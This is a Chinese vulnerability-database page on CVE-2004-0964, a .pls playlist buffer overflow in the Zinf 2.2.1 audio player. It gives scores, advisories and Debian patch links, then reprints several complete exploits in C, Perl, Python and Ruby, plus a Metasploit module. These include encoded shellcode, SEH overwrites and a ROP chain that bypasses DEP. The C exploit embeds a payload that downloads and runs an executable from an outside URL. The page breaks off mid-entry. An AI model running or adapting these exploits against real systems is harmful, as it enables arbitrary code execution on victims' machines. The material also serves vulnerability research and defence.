CVE-2004-0964
CVSS10.0
发布时间 :2005-02-09 00:00:00
修订时间 :2016-10-17 22:50:14
NMCOEPS    

[原文]Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.


[CNNVD]Zinf形态异常的播放列表文件远程缓冲区溢出漏洞(CNNVD-200502-036)

        Zinf 是一款音乐播放器软件。
        Windows和其他较早版本Linux上的Zinf 2.2.1中的缓冲区溢出,可让远程攻击者或本地用户通过.pls文件中的某些值执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:3.0::m68k
cpe:/o:debian:debian_linux:3.0::ia-32
cpe:/o:debian:debian_linux:3.0::sparc
cpe:/o:debian:debian_linux:3.0::ppc
cpe:/o:debian:debian_linux:3.0::arm
cpe:/o:debian:debian_linux:3.0::mipsel
cpe:/o:debian:debian_linux:3.0::hppa
cpe:/o:debian:debian_linux:3.0::ia-64
cpe:/o:debian:debian_linux:3.0::mips
cpe:/o:debian:debian_linux:3.0::s-390
cpe:/a:zinf:zinf:2.2.1
cpe:/o:debian:debian_linux:3.0::alpha

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0964
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0964
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-036
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109608092609200&w=2
(UNKNOWN)  BUGTRAQ  20040924 Buffer overflow in Zinf 2.2.1 for Win32
http://marc.info/?l=bugtraq&m=109638486728548&w=2
(UNKNOWN)  BUGTRAQ  20040927 Re: Buffer overflow in Zinf 2.2.1 for Win32+exploit
http://securityreason.com/securityalert/8341
(UNKNOWN)  SREASON  8341
http://www.debian.org/security/2004/dsa-587
(VENDOR_ADVISORY)  DEBIAN  DSA-587
http://www.securityfocus.com/bid/11248
(VENDOR_ADVISORY)  BID  11248
http://xforce.iss.net/xforce/xfdb/17491
(VENDOR_ADVISORY)  XF  zinf-pls-bo(17491)

- 漏洞信息

Zinf形态异常的播放列表文件远程缓冲区溢出漏洞
危急 缓冲区溢出
2005-02-09 00:00:00 2005-10-20 00:00:00
远程  
        Zinf 是一款音乐播放器软件。
        Windows和其他较早版本Linux上的Zinf 2.2.1中的缓冲区溢出,可让远程攻击者或本地用户通过.pls文件中的某些值执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Debian Linux 3.0 hppa
        Debian freeamp-extras_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_ 2.1.1.0-4woody2_hppa.deb
        Debian freeamp_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0 -4woody2_hppa.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_hppa.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esou nd_2.1.1.0-4woody2_hppa.deb
        Debian Linux 3.0 ppc
        Debian freeamp-extras_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_ 2.1.1.0-4woody2_powerpc.deb
        Debian freeamp_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0 -4woody2_powerpc.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa _2.1.1.0-4woody2_powerpc.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_powerpc.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esou nd_2.1.1.0-4woody2_powerpc.deb
        Debian Linux 3.0 s/390
        Debian freeamp-extras_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_ 2.1.1.0-4woody2_s390.deb
        Debian freeamp_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0 -4woody2_s390.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_s390.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esou nd_2.1.1.0-4woody2_s390.deb
        Debian Linux 3.0 arm
        Debian freeamp-extras_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_ 2.1.1.0-4woody2_arm.deb
        Debian freeamp_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0 -4woody2_arm.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa _2.1.1.0-4woody2_arm.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_arm.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esou nd_2.1.1.0-4woody2_arm.deb
        Debian Linux 3.0 alpha
        Debian freeamp-extras_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp-extras_ 2.1.1.0-4woody2_alpha.deb
        Debian freeamp_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/freeamp_2.1.1.0 -4woody2_alpha.deb
        Debian libfreeamp-alsa_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-alsa _2.1.1.0-4woody2_alpha.deb
        Debian libfreeamp-esound_2.1.1.0-4woody2_alpha.deb
        Debian GNU/Linux 3.0 alias woody
        http://security.debian.org/pool/updates/main/f/freeamp/libfreeamp-esou nd_2.1.1.0-4woody2_alpha.deb
        

- 漏洞信息 (559)

Zinf 2.2.1 Local Buffer Overflow Exploit (EDBID:559)
windows local
2004-09-28 Verified
0 Delikon
[点击下载] [点击下载]
/*
-------------------------------Advisory----------------------------------
Luigi Auriemma <aluigi(aaaatttttt)autistici[D000t]org>

I don't know why this bug has not been tracked but moreover I don't
completely know why it has not been fixed yet in the Windows version of
Zinf.

In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".

This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls file.

A simple proof-of-concept to test the bug is available here:

  http://aluigi.altervista.org/poc/zinf-bof.pls

That's all, just to keep track of this bug and to warn who uses the Windows
version.


BYEZ
--------------------------------------------------------------------------
hey Luigi how much Advisories do you release every month??maybe 30 ;)??
sometimes i think your day has 48 hours ;)

best regards



----------------------------------------------------------------------------
this exploit generates a file exploit.pls which overflows a seh handler
jumps into a service pack independent address then it downloads and executes a file


  you can also download this exploit i a rar file(www.delikon.de).
  in this rar file you will find some screenshots, from OllyDbg 
  which is maybe useful for beginners


*/

#include <stdio.h>
#include <windows.h>

#define SIZE 4048


char shellcode[] = "\xEB"//xored with 0x1d
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";







int main(){

char buffer[SIZE];
char exploit[]="exploit.pls";
char head[]="[playlist]File1=";
int i=0;
ULONG bytes=0;
char *pointer=NULL;
//for the decoder
short int weblength=0xff22;


ULONG RetAddr=0x10404DC4;
/*
SERVICE PACK independent
httpinput.pmi
10404DC4    5D              POP EBP
10404DC5    B8 18000000     MOV EAX,18
10404DCA    5B              POP EBX
10404DCB    C2 0800         RETN 8
*/
//jump into nops
DWORD jump=0x909025eb;
HANDLE file=NULL;

//this is a small messageBox app
char web[]="http://www.delikon.de/klein.exe";


printf("A Buffer overflow exploit against Zinf 2.2.1 for Win32\n");
printf("Coded by Delikon|www.delikon.de|27.9.04\n");
printf("all credits goes to Luigi Auriemma\n");
printf("\n [+] generate exploit.pls\n");



memset(buffer,0x00,SIZE-1);


 file = CreateFile(exploit, GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,NULL);

if(file == (HANDLE)0xffffffff){

	printf("\t[+] error opening the file\n");
	printf("PRESS A KEY\n");
	getchar();
	return -1;

}	
	strcpy(buffer,head);
	
	memset(buffer+strlen(buffer),0x61,17);
	//nops
	memset(buffer+strlen(buffer),0x90,20);
	//
	strcat(buffer,shellcode);
	//search for the shellcode length
	pointer=strstr(buffer,"\x22\xff");
	//weblength[0]-=strlen(web)+1;
	weblength-=strlen(web)+1;
	//increase it
	memcpy(pointer,&weblength,2);
	

	//copy the url in the buffer
	strcat(buffer,web);


	//xor the url with 0x1d
	while(*(buffer+strlen(buffer)-strlen(web)+i)){

	
		*(buffer+strlen(buffer)-strlen(web)+i)=*(buffer+strlen(buffer)-strlen(web)+i)^0x1d;
		i++;
	}
	
	*(buffer+strlen(buffer)-strlen(web)+i)=0x1d;

	//copy the filling
	memset(buffer+strlen(buffer),0x61,517-strlen(buffer));
	//also filling ;)
	memcpy(buffer+strlen(buffer),&RetAddr,4);
	
	memset(buffer+strlen(buffer),0x41,4);
	memset(buffer+strlen(buffer),0x42,4);
		
	//jump 24 bytes forward
	memcpy(buffer+strlen(buffer),&jump,4);
	//jump into pop reg pop reg ret
	memcpy(buffer+strlen(buffer),&RetAddr,4);
	memset(buffer+strlen(buffer),0x45,4);
	memset(buffer+strlen(buffer),0x46,4);
	memset(buffer+strlen(buffer),0x47,4);
	
	

	WriteFile(file,buffer,strlen(buffer),&bytes,0);

	CloseHandle(file);
	printf("\n [+] ready press a key\n");
	getchar();


	exit(1);

	
}

// milw0rm.com [2004-09-28]
		

- 漏洞信息 (7887)

Zinf Audio Player 2.2.1 (PLS File) Stack Overflow PoC (EDBID:7887)
windows dos
2009-01-27 Verified
0 Hakxer
[点击下载] [点击下载]
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE)  Buffer Overflow PoC

my $chars="\x90" x 2000;

open(MYFILE,'>>hakxer.pls');

print MYFILE $chars;

close(MYFILE);

print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";

# milw0rm.com [2009-01-27]
		

- 漏洞信息 (7888)

Zinf Audio Player 2.2.1 (PLS File) Local Buffer Overflow Exploit (univ) (EDBID:7888)
windows local
2009-01-28 Verified
0 Houssamix
[点击下载] [点击下载]
#!/usr/bin/perl -w

# Author : Houssamix

# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)



print "===================================================================== \n";
print "Author : Houssamix 						     \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1  Universal Local Buffer Overflow exploit	      \n";
print "===================================================================== \n";


my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8  push esp - ret > universal adress(vorbisfile.dll)
my $nop = "\x90" x 128 ;

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";


my $file="hsmx.pls";

$exploit = $overflow.$ret.$nop.$shellcode;

open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;


close($FILE);
print "$file has been created \n";

# milw0rm.com [2009-01-28]
		

- 漏洞信息 (8267)

Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit (EDBID:8267)
windows local
2009-03-23 Verified
0 His0k4
[点击下载] [点击下载]
#usage: exploit.py
print "**************************************************************************"
print " Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz), www.secdz.com\n"
print "**************************************************************************"
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com 
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x48\x4e\x57"
"\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x34"
"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x56\x4b\x58\x42\x34\x42\x53\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x30\x4b\x48\x42\x47\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x4a\x36\x4a\x39"
"\x50\x4f\x4c\x48\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
"\x4e\x36\x43\x56\x42\x30\x5a")

exploit =   "\x41"*1424
exploit +=  "\xEB\x06\x90\x90"
exploit +=  "\x0C\x04\x05\x12" # zinf.ui
exploit +=  shellcode

try:
    out_file = open("exploit.pls",'w')
    out_file.write(exploit)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-03-23]
		

- 漏洞信息 (16688)

Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow (EDBID:16688)
windows local
2010-11-24 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: zinfaudioplayer221_pls.rb 11127 2010-11-24 19:35:38Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
				An attacker must send the file to victim and the victim must open the file.
				Alternatively it may be possible to execute code remotely via an embedded
				PLS file within a browser, when the PLS extention is registered to Zinf.
				This functionality has not been tested in this module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'patrick' ],
			'Version'        => '$Revision: 11127 $',
			'References'     =>
				[
					[ 'CVE', '2004-0964' ],
					[ 'OSVDB', '10416' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
					[ 'BID', '11248' ],
				],
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					# Tested by patrick - 20090429 xpsp3
					[ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Sep 24 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'exploit_zinf.pls']),
			], self.class)

	end

	def exploit
		seh = generate_seh_payload(target.ret)
		filepls = rand_text_alpha_upper(1424) + seh

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(filepls)

	end

end

		

- 漏洞信息 (17600)

Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability (DEP BYPASS) (EDBID:17600)
windows local
2011-08-03 Verified
0 C4SS!0 and h1ch4m
[点击下载] [点击下载]
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tuturial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#

sys = `ver`
if sys =~/Windows/
system("cls")
system("color 4f")
else
system("clear")
end
print '''

		Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
		Created by C4SS!0 and h1ch4m
		E-mails:
			C4SS!0 : louredo_@hotmail.com 
	        	h1ch4m : h1ch4m@hotmail.com 
		Sites: 
			C4SS!0 : net-fuzzer.blogspot.com
			h1ch4m : net-effects.blogspot.com
		
'''
sleep(3)
#Endereco para VirtualProtect 0x7C3528DD
#########################################ROP FOR LOAD "msvcr71.dll"#################################
rop = [0x10002a6f].pack('V') # PUSH ESP # POP EDI # POP ESI # POP EBP # MOV EAX,1 # POP EBX # ADD ESP,30 # RETN
rop += "A" * 12
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!
rop += "A" * (80-rop.length)
rop += [0x100014e8].pack('V') # MOV EAX,EDI # POP EDI # POP ESI # RETN
rop += "G"  * 8 # JUNK
rop += [0x1205017d].pack('V') # POP EBX # RETN    
rop += "\x00\x00\x00\x00"
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN  
rop += [0x112054dd].pack('V') # XCHG EAX,EBP # RETN   REPLACE
rop += [0x00420044].pack('V') # POP EBP # RETN
rop += [0x0040556A].pack('V') # ADD ESP,54 # RETN // Funcao de retorno da LoadLibraryA , Depois de executar LoadLibraryA vem para AQUI.!!!
rop += [0x10001E11].pack('V') # POP EDI # RETN
rop += [0x7C801D7B].pack('V') # Endereco para LoadLibraryA  // Conserta o valor de EDI para o PUSHAD
rop += [0x1200CA76].pack('V') # PUSHAD # RETN
rop += "msvcr71.dll\x00"
rop += "D" * 56
##########################################ROP END HERE####################################

##########################################ROP FOR VirtualProtect###########################
rop += [0x1200edf1].pack('V') # POP EDI # RETN
rop += "JJJJ" # JUNK
rop += [0x7C3528DD].pack('V') # Ponteiro para VirtualProtect
rop += [0x00409E6A].pack('V') # MOV EAX,EBX # POP EBX #  RETN 0c
rop += "PPPP"
rop += [0x0042044B].pack('V') * 3 # RETN
rop += [0x0040dc54].pack('V') # PUSH ESI # ADD AL,5E # POP EBP # RETN 04 
############################ADICIONANDO A EAX######################################
rop += [0x7C3410C3].pack('V') # POP ECX # RETN
rop += [0x00000200].pack('V') # O valor que sera adicionado a EAX
rop += [0x7C358F2C].pack('V') # ADD EAX,ECX # POP ESI # RETN
rop += "GGGG"
#####################################################################################
rop += [0x0040fd82].pack('V') # XCHG EAX,ECX # POP EBP # RETN
rop += "BBBB"
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN  
rop += [0x1060fd8f].pack('V') # XCHG EAX,EBP # RETN 
################################MUDA O ENDEREÇO DO PARAMETRO#######################################
rop += [0x1201dc80].pack('V') # MOV EAX,ECX # RETN  
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x00\x00\x00"
rop += [0x7c3451b9].pack('V') # POP EDX # RETN
rop += "\x00\x00\x00\x00" 
rop += [0x1203678a].pack('V') # ADD EBX,EAX # NOP # NOP # NOP # NOP # RETN  //Endereço do ultimo paramentro de VirtualProtect
rop += [0x1000333e].pack('V') # ADD EDX,EBX # POP EBX # RETN 10
rop += "QQQQ"
rop += [0x12007AD7].pack('V') * 10 # RETN
###################################################################################################
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN  // Endereco disponivel
rop += [0x12011D0B].pack('V') # XCHG EAX,ECX # CMP EAX,5E5F0002 # RETN
rop += [0x12007AD7].pack('V') # RETN
rop += [0x10001436].pack('V') # MOV EAX,ECX # POP EBX # RETN
rop += "GGGG"
rop += [0x12007AD6].pack('V') # POP EBX # RETN
rop += "\x00\x03\x00\x00"
rop += [0x11601da9].pack('V') # POP EAX # RETN 
rop += "\x40\x00\x00\x00"
rop += [0x0040ba55].pack('V') # XCHG EAX,EDX # RETN
rop += [0x12026C85].pack('V') # PUSHAD # RETN
rop += "A" * 156
#########################Ir para o shellcode depois da funçao VirtualProtect###############
rop += [0x10002e13].pack('V')  # ADD EAX,ECX # RETN
rop += [0x10610e4d].pack('V')  # POP ECX # RETN
rop += [0x0000012b].pack('V')  # Valor que sera adicionado a EAX
rop += [0x10002e13].pack('V')  # ADD EAX,ECX # RETN
rop += [0x111025F1].pack('V')  # CALL EAX and JMP to my Shellcode. :)
##########################################ROP END HERE#####################################
shellcode = "\x44" * (50-0x12)
shellcode += 
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIONMRU2SJXH9KHNHYD4FDK"+
"D0XGC9YX1FRP1T0B2TCRPEBK3RJMNZ8GMLV879DONSVQXK7FWLCSIJ5VLO0WXWYWVLDO0O2SZGL62OVO"+
"RP3N3DMMERZJDY3R9N0Q695JE6J3KEUYGM5LNQTR0EK3PUDYY0PN3MY3NQ4KX980PGSPPN3N5L3Q5RI9"+ #Shellcode Alpha Numeric WinExec "Calc.exe"
"GQ3J5M6MO9KMMOQ7OHZT2X2SLLUKOS1L6VDN6QKJWUGTV07YVMHMKQY4N5NG4WLE4QML9QWOOELVEXMQ"+ #Baseaddress EAX.
"2LFNN2UMWFWE2KSPLWK8OSWDJ1O8NOTGPQK1K0KJGZJ5OE8VCNW9T4Q2RUMOZ6NCTL9TSLKJNZKW0NMN"+
"LSQMFWOHKHLLX7ON4SNZQ4NQO4QMVLNMZPVD89ULWKNTQMP0M1S3L6SNXMWBYNPPIT73NOXWKRRVZRN8"+
"WDN0SUK8WOMV4DNNTWPYWN27KA"
buf = "A" * 1300
buf += rop
buf += shellcode

print "\t\t[+]Creating Exploit File...\n"
sleep(1)
begin
File.open("Exploit.pls","wb") do |f| 
f.write buf
f.close
print "\t\t[+]File Exploit.pls create successfully.\n"
sleep(1)
end
rescue
print "**[-]Error: #{$!}\n"
exit(0)
end		

- 漏洞信息 (F83051)

Zinf Audio Player 2.2.1 (PLS File) Stack Overflow. (PacketStormID:F83051)
2009-11-26 00:00:00
patrick,Trancek  metasploit.com
exploit,overflow
CVE-2004-0964
[点击下载]

This Metasploit module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

